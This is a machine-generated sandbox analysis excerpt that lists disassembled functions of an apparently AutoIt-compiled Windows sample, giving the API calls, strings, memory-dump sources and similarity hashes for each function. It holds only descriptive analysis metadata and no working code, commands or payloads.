closesocket.WSOCK32(00000000), ref: 00F0624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F06263

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: a521e502bb905cd2c3c88169278f4504200128ea77ef77147a89e85c21f5bbe4
Instruction ID: 3ac9f5517eece6f3f715148518d0c446104608566a1e737e0ad9111883b8ef7a
Opcode Fuzzy Hash: a521e502bb905cd2c3c88169278f4504200128ea77ef77147a89e85c21f5bbe4
Instruction Fuzzy Hash: DA31A131600108ABDF10AF64CC85BBE77ADEF45760F048069FD05E72D1DB74AC58ABA1

Function 00EEF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00EEF671
__wcsnicmp.LIBCMT ref: 00EEF692
__wcsnicmp.LIBCMT ref: 00EEF6AC

Strings

#OnAutoItStartRegister, xrefs: 00EEF6A6
#requireadmin, xrefs: 00EEF68C
#notrayicon, xrefs: 00EEF669

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 61f3cc3ac8457ba9c811b5eca55de6e579c05eb3615e0f265d9e0079dd98d271
Instruction ID: 94dc39a10a00c3c9367680c5565b7c7b0ce9000d295158bc76bbcada5bc28d15
Opcode Fuzzy Hash: 61f3cc3ac8457ba9c811b5eca55de6e579c05eb3615e0f265d9e0079dd98d271
Instruction Fuzzy Hash: 9C2176722141A677D620AA36AC03EFB73D8EF55348F10603BF842B6091EFA0AD81D2D5

Function 00EEDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EEDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EEDC2F
SysAllocString.OLEAUT32(00000000), ref: 00EEDC32
SysAllocString.OLEAUT32 ref: 00EEDC53
SysFreeString.OLEAUT32 ref: 00EEDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 00EEDC76
SysAllocString.OLEAUT32(?), ref: 00EEDC84

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 71adbd280fafe13eacd6c94fb3321070237f108c99c86454232fe379f6028890
Instruction ID: defc24db6968ed53e28d63ec3f2e4dff7836e744586ec878bc96bb345eeda336
Opcode Fuzzy Hash: 71adbd280fafe13eacd6c94fb3321070237f108c99c86454232fe379f6028890
Instruction Fuzzy Hash: EE21563560824CAF9B10DFA9DC88DEBB7ECEB09360B11C125F914DB261D670EC45D764

Function 00F175CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E91D73
Part of subcall function 00E91D35: GetStockObject.GDI32(00000011), ref: 00E91D87
Part of subcall function 00E91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E91D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F17632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F1763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F1764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F17659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F17665

Strings

Msctls_Progress32, xrefs: 00F17603

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9ae00f18e89d64273fdf05c0a7b21a7f834943a17b227c69170acb042221770b
Instruction ID: e071fe9149dc7a99d1175745c90d80a6e8c1f5702b544421aa4e5e568cc20c22
Opcode Fuzzy Hash: 9ae00f18e89d64273fdf05c0a7b21a7f834943a17b227c69170acb042221770b
Instruction Fuzzy Hash: 6511B6B211021DBFEF159F64CC85EE77F6DEF087A8F014114BA08A2050CA729C61EBA4

Function 00EB9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00EB9AE6

Part of subcall function 00EB3187: EncodePointer.KERNEL32(00000000), ref: 00EB318A
Part of subcall function 00EB3187: __initp_misc_winsig.LIBCMT ref: 00EB31A5
Part of subcall function 00EB3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EB9EA0
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EB9EB4
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EB9EC7
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EB9EDA
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EB9EED
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EB9F00
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EB9F13
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EB9F26
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EB9F39
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EB9F4C
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EB9F5F
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EB9F72
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EB9F85
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EB9F98
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EB9FAB
Part of subcall function 00EB3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EB9FBE

__mtinitlocks.LIBCMT ref: 00EB9AEB
__mtterm.LIBCMT ref: 00EB9AF4

Part of subcall function 00EB9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EB9AF9,00EB7CD0,00F4A0B8,00000014), ref: 00EB9C56
Part of subcall function 00EB9B5C: _free.LIBCMT ref: 00EB9C5D
Part of subcall function 00EB9B5C: DeleteCriticalSection.KERNEL32(00F4EC00,?,?,00EB9AF9,00EB7CD0,00F4A0B8,00000014), ref: 00EB9C7F

__calloc_crt.LIBCMT ref: 00EB9B19
__initptd.LIBCMT ref: 00EB9B3B
GetCurrentThreadId.KERNEL32 ref: 00EB9B42

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 1ac902f5271eef31d204bb1beb821f595179219ec91f98547f4c60b784a8faff
Instruction ID: 9eceb0b1b61965ff2425cd841c8f0a66b749866ab05210970559a121464677e0
Opcode Fuzzy Hash: 1ac902f5271eef31d204bb1beb821f595179219ec91f98547f4c60b784a8faff
Instruction Fuzzy Hash: 94F090325197116AE7347775BC536CB36D4AF02738F206A1AF664F61D3EF20844142A4

Function 00EB406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EB3F85), ref: 00EB4085
GetProcAddress.KERNEL32(00000000), ref: 00EB408C
EncodePointer.KERNEL32(00000000), ref: 00EB4097
DecodePointer.KERNEL32(00EB3F85), ref: 00EB40B2

Strings

combase.dll, xrefs: 00EB4080
RoUninitialize, xrefs: 00EB4074

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: b9964c2a7efe2bde160785a45230465cfcbe67210b47a0c21c0b1703585c0360
Instruction ID: 2f8bc74b090d8bee4cdfbb43513f7327cc1f2cdb56c3ce3cfc08bf58004a6b2e
Opcode Fuzzy Hash: b9964c2a7efe2bde160785a45230465cfcbe67210b47a0c21c0b1703585c0360
Instruction Fuzzy Hash: 84E0B6B0981B08EFEB50AF75EC0DB863EA5B714787F518025F611E10E0CBB68608FA16

Function 00EF64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EF660B
_memmove.LIBCMT ref: 00EF6546

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

_memmove.LIBCMT ref: 00EF65B9
_memmove.LIBCMT ref: 00EF66A0
_memmove.LIBCMT ref: 00EF66B9
_memmove.LIBCMT ref: 00EF66D5

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: a2cff0e296bdadafabe039c0f6eb252ce43ab47fe6ca1f52d5a76d4a2c3a76d7
Instruction ID: 11974fbbb079889bc75167296a88be2123d6234e286078e699d7562f05a8e1a7
Opcode Fuzzy Hash: a2cff0e296bdadafabe039c0f6eb252ce43ab47fe6ca1f52d5a76d4a2c3a76d7
Instruction Fuzzy Hash: 4761993050025A9BCF15EF64CC82AFF37A9AF05308F055968FE59BB292EB35E905CB50

Function 00F101E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00F10E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0FDAD,?,?), ref: 00F10E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F102BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F102FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F10320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F10349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F1038C
RegCloseKey.ADVAPI32(00000000), ref: 00F10399

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 7a1cf9895aa768094b4fe2d84654ac39fb36bcdd0e37682effc711918a4e77f2
Instruction ID: c0cfb7361e8fab9e5d3cf65adc6162ad51586bff5bc2d8b2c01ee543e0bbb222
Opcode Fuzzy Hash: 7a1cf9895aa768094b4fe2d84654ac39fb36bcdd0e37682effc711918a4e77f2
Instruction Fuzzy Hash: 80517B71608204AFCB14EF64C845EAFBBE8FF89310F04491DF495972A2DB71E988DB52

Function 00F15799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00F157FB
GetMenuItemCount.USER32(00000000), ref: 00F15832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F1585A
GetMenuItemID.USER32(?,?), ref: 00F158C9
GetSubMenu.USER32(?,?), ref: 00F158D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00F15928

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: f418ad3b0ba3d4d563039d88cfe01716aed5d0942c8b846f219ce396acdba6ee
Instruction ID: 58817f2c5877a0741966b26d94c9e636d33f286fb1b2afedc98d2342c0360b81
Opcode Fuzzy Hash: f418ad3b0ba3d4d563039d88cfe01716aed5d0942c8b846f219ce396acdba6ee
Instruction Fuzzy Hash: 06513831E00619EFCF15DF64C845AEEB7B5EF88720F114069E901BB251CB70AE819B90

Function 00EEEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EEEF06
VariantClear.OLEAUT32(00000013), ref: 00EEEF78
VariantClear.OLEAUT32(00000000), ref: 00EEEFD3
_memmove.LIBCMT ref: 00EEEFFD
VariantClear.OLEAUT32(?), ref: 00EEF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EEF078

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 29e2fc3d7dd0c2361f95a1fa96fdafa6f5ec7d303b4fc33f76ca1b1428087937
Instruction ID: 28f351626311a226b6d09e7c69e114eee5ad2a40d64248437abde593fdd5c686
Opcode Fuzzy Hash: 29e2fc3d7dd0c2361f95a1fa96fdafa6f5ec7d303b4fc33f76ca1b1428087937
Instruction Fuzzy Hash: 2D5169B5A00249EFCB14CF58C880AAAB7B8FF4C314B158569E959EB305E335E911CFA0

Function 00EF220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF22A3
IsMenu.USER32(00000000), ref: 00EF22C3
CreatePopupMenu.USER32 ref: 00EF22F7
GetMenuItemCount.USER32(000000FF), ref: 00EF2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EF2386

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: acdfd3f76065ae22b2c380e7541a699f4e66cb107c08fa5fe969cf020c5bbd16
Instruction ID: 401a55648c711484f9e73651c86562403a2af58c9fa18afb3f1c24633d04540c
Opcode Fuzzy Hash: acdfd3f76065ae22b2c380e7541a699f4e66cb107c08fa5fe969cf020c5bbd16
Instruction Fuzzy Hash: C2518CB060620EDBDF21CF68D888BBDBBF5AF45318F14912DEB15AB290D3749944CB51

Function 00E91765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00E9179A
GetWindowRect.USER32(?,?), ref: 00E917FE
ScreenToClient.USER32(?,?), ref: 00E9181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E9182C
EndPaint.USER32(?,?), ref: 00E91876

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 7953d2884bb3b812bf07968a197ceec525ff94062b96186d3523c23bbded13e6
Instruction ID: 7192fb17bd3fda20688211dde3224a9740945f1d92738705bda45cf46a80af22
Opcode Fuzzy Hash: 7953d2884bb3b812bf07968a197ceec525ff94062b96186d3523c23bbded13e6
Instruction Fuzzy Hash: 9941D231100705AFDB10DF24CC84FBA7BE8EB4A725F14466DFAA4972A1C7319849EB61

Function 00F1B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00F557B0,00000000,01805D78,?,?,00F557B0,?,00F1B5A8,?,?), ref: 00F1B712
EnableWindow.USER32(00000000,00000000), ref: 00F1B736
ShowWindow.USER32(00F557B0,00000000,01805D78,?,?,00F557B0,?,00F1B5A8,?,?), ref: 00F1B796
ShowWindow.USER32(00000000,00000004,?,00F1B5A8,?,?), ref: 00F1B7A8
EnableWindow.USER32(00000000,00000001), ref: 00F1B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F1B7EF

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 27702032d69866bbcf4b4d79d4690229ee373e9b87a5bd14d1033f27a3f1366e
Instruction ID: ce068f30256d1ee6a3a3aacf60198653dd86e79cfffad96ca35e076df6ed240c
Opcode Fuzzy Hash: 27702032d69866bbcf4b4d79d4690229ee373e9b87a5bd14d1033f27a3f1366e
Instruction Fuzzy Hash: 86414F34A04244EFDB26CF24C499BD47BE1FB45320F1881B9E9488F6F2C731A896EB51

Function 00F0709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00F04E41,?,?,00000000,00000001), ref: 00F070AC

Part of subcall function 00F039A0: GetWindowRect.USER32(?,?), ref: 00F039B3

GetDesktopWindow.USER32 ref: 00F070D6
GetWindowRect.USER32(00000000), ref: 00F070DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F0710F

Part of subcall function 00EF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EF52BC

GetCursorPos.USER32(?), ref: 00F0713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F07199

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 1244a12c6adc0b8ea943fa7f5c53e5e5cb934215b1d90443469f16caaf1d99f7
Instruction ID: afbeea96c3cf672135be439b11e4e0c07e339263d552f1e5431b89a11f23963b
Opcode Fuzzy Hash: 1244a12c6adc0b8ea943fa7f5c53e5e5cb934215b1d90443469f16caaf1d99f7
Instruction Fuzzy Hash: 4631B272909309ABD720EF14C849B9BB7EAFF88314F004919F595A71D1CB74EA09DB92

Function 00EE8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EE80C0
Part of subcall function 00EE80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EE80CA
Part of subcall function 00EE80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EE80D9
Part of subcall function 00EE80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EE80E0
Part of subcall function 00EE80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EE80F6

GetLengthSid.ADVAPI32(?,00000000,00EE842F), ref: 00EE88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EE88D6
HeapAlloc.KERNEL32(00000000), ref: 00EE88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00EE88F6
GetProcessHeap.KERNEL32(00000000,00000000,00EE842F), ref: 00EE890A
HeapFree.KERNEL32(00000000), ref: 00EE8911

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

